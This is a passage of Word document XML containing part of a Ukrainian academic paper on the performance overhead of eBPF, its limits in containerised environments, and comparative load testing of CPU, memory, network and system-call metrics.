        </w:rPr>
        <w:t xml:space="preserve"> дозволяє виконувати код на рівні ядра, що забезпечує високу швидкість обробки даних, однак іноді це може призвести до додатко</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>вого навантаження на CPU та пам’</w:t>
      </w:r>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ять. Виконання складних фільтрів або збору метрик у реальному часі може спричинити затримки, особливо при високих обсягах трафіку або великій кількості системних викликів, які потребують обробки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0022205F" w:rsidRPr="00742B58" w:rsidRDefault="00F52DE5" w:rsidP="0022205F">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2. Контейнеризація та ізоляція.</w:t>
      </w:r>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> У контейнерних середовищах </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> може працювати з ізольованими ресурсами, що вимагає додаткових механізмів для коректної роботи між контейнерами та </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>хостом</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Контейнеризація створює додаткові обмеження для </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, наприклад, обмеження доступу до ядра та системних ресурсів, що можуть уповільнити виконання деяких функцій або вимагати використання додаткових інструментів для інтеграції.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0022205F" w:rsidRPr="00742B58" w:rsidRDefault="00F52DE5" w:rsidP="0022205F">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3. Реакція на зовнішні зміни.</w:t>
      </w:r>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Оскільки </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> активно взаємодіє з ядром, будь-які зміни в конфігурації або архітектурі контейнерної системи (наприклад, зміни у політиках б</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>езпеки, оновлення ядра або зміні мережевої</w:t>
      </w:r>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0022205F" w:rsidRPr="00742B58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>конфігурації) можуть призвести до додаткових накладних витрат, які негативно позначаються на продуктивності.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C16D9" w:rsidRPr="00BC6B10" w:rsidRDefault="000C16D9" w:rsidP="000C16D9">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Враховуючи зазначене вище, п</w:t>
      </w:r>
      <w:r w:rsidRPr="004D7B19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ід час проведення дослідження для оцінки впливу технології </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D7B19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D7B19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> на продуктивність системи було здійснено кілька етапів тестування, що дозволили детально вивчити ефекти її інтеграції</w:t>
      </w:r>
      <w:r w:rsidR="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в реальних умовах, а саме</w:t>
      </w:r>
      <w:r w:rsidR="00BC6B10" w:rsidRPr="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C16D9" w:rsidRPr="004D7B19" w:rsidRDefault="00BC6B10" w:rsidP="000C16D9">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="000C16D9" w:rsidRPr="004D7B19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Для точного аналізу ефективності </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000C16D9" w:rsidRPr="004D7B19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000C16D9" w:rsidRPr="004D7B19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> було проведено порівняльне тестування до і після його інтеграції. В процесі тестування </w:t>
      </w:r>
      <w:r w:rsidR="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>було</w:t>
      </w:r>
      <w:r w:rsidR="000C16D9" w:rsidRPr="004D7B19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> зібра</w:t>
      </w:r>
      <w:r w:rsidR="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>но</w:t>
      </w:r>
      <w:r w:rsidR="000C16D9" w:rsidRPr="004D7B19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> ключові метрики, зокрема</w:t>
      </w:r>
      <w:r w:rsidR="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> дані про використання CPU, пам’</w:t>
      </w:r>
      <w:r w:rsidR="000C16D9" w:rsidRPr="004D7B19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ят</w:t>
      </w:r>
      <w:r w:rsidR="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidR="000C16D9" w:rsidRPr="004D7B19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, пропускну здатність мережі, а також час виконання системних викликів. Ці показники стали основними для оцінки впливу </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000C16D9" w:rsidRPr="004D7B19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000C16D9" w:rsidRPr="004D7B19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> на загальну продуктивність системи. Зібрані дані дозволили порівняти рівень продуктивності в різних умовах, а також ідентифікувати зміни, що виникають під час активного використання технології</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”, - [23]</w:t>
      </w:r>
      <w:r w:rsidR="000C16D9" w:rsidRPr="004D7B19">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C076D" w:rsidRPr="001C076D" w:rsidRDefault="000C16D9" w:rsidP="000C16D9">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">У процесі тестування було </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>змодульовано</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> кілька сценаріїв з різним р</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">івнем навантаження на систему – </w:t>
      </w:r>
      <w:r w:rsidRPr="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">від низької до високої інтенсивності запитів. Це дозволило оцінити, як система адаптується до змін і наскільки ефективно </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> працює в умовах високої навантаженості. Результати показали, що підвищене навантаження не завжди призводить до значного зниження продуктивності, однак при високих навантаженнях виникають помітні відмінності в часі обробки запитів та затримках мережевого трафіку.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C076D" w:rsidRDefault="000C16D9" w:rsidP="001C076D">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Особливу увагу було приділено моніторингу додаткових вит</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>рат ресурсів, таких як CPU, пам’</w:t>
      </w:r>
      <w:r w:rsidRPr="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">ять та дискова пропускна здатність, що виникають в результаті інтеграції </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. За результатами тестування було виявлено, що хоча </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> не призводить до суттєвих додаткових витрат при невеликій інтенсивності запитів, у випадку високого навантаження на систему спостерігається збільшення використання ресурсів, що, у свою чергу, може призвести до зниження загальної ефективності. Це свідчить про необхідність оптимізації налаштувань для мінімізації впливу на продуктивність при великих обсягах обробки даних</w:t>
      </w:r>
      <w:r w:rsidR="00BC6B10" w:rsidRPr="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>[2</w:t>
      </w:r>
      <w:r w:rsidR="00BC6B10" w:rsidRPr="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>4]</w:t>
      </w:r>
      <w:r w:rsidRPr="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C16D9" w:rsidRDefault="000C16D9" w:rsidP="001C076D">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">У підсумку, тестування показало, </w:t>
      </w:r>
      <w:r w:rsidR="00BC6B10" w:rsidRPr="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">що технологія </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> має суттєвий потенціал для підвищення безпеки та моніторингу без значних втрат у продуктивності, однак для максимізації ефективності необхідно ретельно налаштовувати її параметри і враховувати потенційний вплив на ресурси системи при великих навантаженнях</w:t>
      </w:r>
      <w:r w:rsidR="00BC6B10" w:rsidRPr="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [25]</w:t>
      </w:r>
      <w:r w:rsidRPr="000C16D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C076D" w:rsidRDefault="001C076D" w:rsidP="001C076D">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C076D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Для візуалізації математичн</w:t>
      </w:r>
      <w:r w:rsidR="00C31EAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ого</w:t>
      </w:r>
      <w:r w:rsidRPr="001C076D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C31EAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>обґрунтування проведеного дослідження</w:t>
      </w:r>
      <w:r w:rsidRPr="001C076D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> у цьому контексті мож</w:t>
      </w:r>
